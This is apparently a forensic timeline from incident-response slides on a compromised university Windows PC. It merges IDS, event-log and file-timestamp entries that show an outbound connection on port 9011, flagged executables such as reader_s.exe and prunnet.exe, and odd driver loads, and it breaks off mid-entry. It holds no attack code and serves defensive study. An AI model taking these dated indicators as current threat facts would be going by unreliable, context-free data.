SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -02/19/09 10:37:43 bro no=ProtocolFound na=NOTICE_FILE es=node02.0 sa=164.107.xxx.177 sp=1033/tcp da=94.76.216.202 dp=9011/tcp num=16 msg=164.107.xxx.177/1033\ >\ 94.76.216.202/9011\ Apache\ (via\ HTTP)\ on\ port\ 9011/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-63fb8102/19/09 10:38:16 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. -02/19/09 10:38:35 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator.-02/19/09 10:38:36 modified smax4pnp.exe C:\\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive02/19/09 10:38:39 modified igfxtray.exe C:\\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive02/19/09 10:38:40 modified hkcmd.exe C:\\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive02/19/09 10:38:43 modified DVDLauncher.exe C:\\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File02/19/09 10:38:46 modified sgtray.exe C:\\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive02/19/09 10:38:48 accessed sgtray.exe C:\\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:00 modified acrotray.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:04 modified ISUSPM.exe C:\\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:06 accessed acrodist.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:07 accessed ISUSPM.exe C:\\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:07 modified issch.exe C:\\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:27 accessed xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:39:49 logged SysEvent.Evt EVENT ID: 10010 EVENT TYPE: ERROR EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The server {0002DF01-0000-0000-C000-000000000046} did not register with DCOM within the required timeout. -02/19/09 10:39:53 modified SbTrayManager.exe C:\\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:54 accessed agent.exe C:\\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive02/19/09 10:39:54 accessed TIMOUNTERMONITOR.EXE-1A929E4A.pfC:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf02/19/09 10:39:54 written TIMOUNTERMONITOR.EXE-1A929E4A.pfC:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf02/19/09 10:39:54 modified TIMOUNTERMONITOR.EXE-1A929E4A.pfC:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf02/19/09 10:39:54 accessed TRUEIMAGEMONITOR.EXE-08A65A75.pfC:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf02/19/09 10:39:54 written TRUEIMAGEMONITOR.EXE-08A65A75.pfC:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf02/19/09 10:39:54 modified TRUEIMAGEMONITOR.EXE-08A65A75.pfC:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf02/19/09 10:39:54 accessed UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf02/19/09 10:39:54 written UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf02/19/09 10:39:54 modified UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf02/19/09 10:39:55 written SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf02/19/09 10:39:55 modified SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf02/19/09 10:40:00 accessed SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf02/19/09 10:40:00 written SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf02/19/09 10:40:00 modified SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf02/19/09 10:40:02 accessed SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf02/19/09 10:40:05 logged SysEvent.Evt EVENT ID: 40961 EVENT TYPE: WARNING EVENT CATEGORY: SPNEGO (Negotiator) SID: COMPUTER: HACKEDPC DESCRIPTION: The Security System could not establish a secured connection with the server ldap/ubw.ohio-state.edu. No authentication protocol was available. -02/19/09 10:40:05 accessed SBTRAYMANAGER.EXE-19E725FA.pfC:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf02/19/09 10:40:05 written SBTRAYMANAGER.EXE-19E725FA.pfC:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf02/19/09 10:40:05 modified SBTRAYMANAGER.EXE-19E725FA.pfC:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf02/19/09 10:40:06 accessed SSMMgr.exe C:\\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive02/19/09 10:40:15 modified reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7026 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The following boot-start or system-start driver(s) failed to load: ;irzylwcf;zmzfozjg -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service was successfully sent a start control. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service entered the running state. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -02/19/09 10:40:20 modified services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:40:20 accessed SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf02/19/09 10:40:20 written SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf02/19/09 10:40:20 modified SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf02/19/09 10:40:21 accessed services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:40:21 modified rundll32.exe C:\\WINDOWS\SYSTEM32\rundll32.exe Windows Executable Code\Executable File, Archive02/19/09 10:40:23 written USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf02/19/09 10:40:23 modified USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf02/19/09 10:40:27 accessed USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf02/19/09 10:40:31 accessed Weather.exe C:\\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive02/19/09 10:40:34 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -02/19/09 10:40:34 modified ctfmon.exe C:\\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive02/19/09 10:40:41 accessed WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf02/19/09 10:40:41 written WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf02/19/09 10:40:41 modified WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf02/19/09 10:40:42 modified TransferAgent.exe C:\\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive02/19/09 10:40:44 modified prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:40:45 accessed TransferAgent.exe C:\\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive02/19/09 10:40:47 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: TransferAgent.exe - Application Error : The application failed to initialize properly (0xc000007b). Click on OK to terminate the application. -
![Page 16: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/16.jpg)
02/19/09 10:40:54 accessed PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 10:40:54 written PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 10:40:54 modified PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 10:40:54 accessed PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 10:40:54 written PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 10:40:54 modified PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf02/19/09 10:40:56 accessed TRANSFERAGENT.EXE-19919614.pfC:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf02/19/09 10:40:56 written TRANSFERAGENT.EXE-19919614.pfC:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf02/19/09 10:40:56 modified TRANSFERAGENT.EXE-19919614.pfC:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf02/19/09 10:41:29 accessed msmsgs.exe C:\\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive02/19/09 10:41:30 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -02/19/09 10:41:31 accessed index.dat http://ubw.osu.edu History\Daily -02/19/09 10:43:14 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:43:14 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:43:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:44:24 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:44:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:44:36 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:44:43 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:44:43 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:44:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:44:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:44:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:45:08 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:45:12 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:45:12 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:45:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:45:27 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:45:27 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:45:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:45:42 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:45:42 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:45:51 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:45:56 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:45:57 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:46:06 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:46:11 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:46:12 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:46:21 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:46:25 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:46:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:46:35 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:46:40 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:46:41 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:46:50 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:46:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:46:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:47:04 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:47:09 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:47:09 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:47:18 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:47:23 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:47:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:47:32 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:49:57 modified googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive02/19/09 10:51:00 accessed googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive02/19/09 10:51:55 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. -02/19/09 10:53:36 accessed reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:53:41 modified wmplayer.exe C:\\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive02/19/09 10:53:56 modified xlicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 10:54:02 modified Eudora.exe C:\\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 11:00:10 accessed RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 written RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 modified RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 accessed RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 written RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 modified RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:01:21 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:01:21 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:01:33 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:01:37 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:01:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:01:50 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:01:53 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:01:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:03 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:02:04 modified reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 11:02:06 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:06 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:16 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:02:21 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:31 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:02:36 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT 